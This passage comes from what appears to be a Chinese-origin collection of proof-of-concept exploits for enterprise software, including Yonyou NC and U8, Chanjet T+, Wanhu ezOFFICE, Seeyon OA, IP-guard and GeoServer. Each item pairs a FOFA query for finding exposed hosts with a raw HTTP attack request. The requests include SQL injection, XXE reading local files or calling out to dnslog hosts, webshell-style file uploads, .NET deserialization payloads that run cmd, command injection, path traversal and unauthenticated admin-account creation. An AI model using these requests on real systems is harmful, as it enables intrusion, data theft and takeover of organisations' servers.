User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. 用友NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. 用友NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. 用友NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. 用友NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. 用友U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. 用友U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. 用友U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. 用友GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. 用友GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. 用友GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. 用友GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. 用友GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. 用友U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. 用友U8 CRM uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. 泛微E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. 迪普 DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. 畅捷通T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target. It executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. 畅捷通T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie from the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the Cookie obtained, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. 畅捷通T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. 畅捷通T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 privilege bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 (Wanhu) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The string 6cfe798ba8e5b85feb50164c59f4bec9 appearing on lines 42 and 43 of the response confirms the vulnerability.

67. 万户 (Wanhu) ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The written file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 (Wanhu) ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 (Wanhu) ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 (Wanhu) ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 (Seeyon) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 (Seeyon) M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
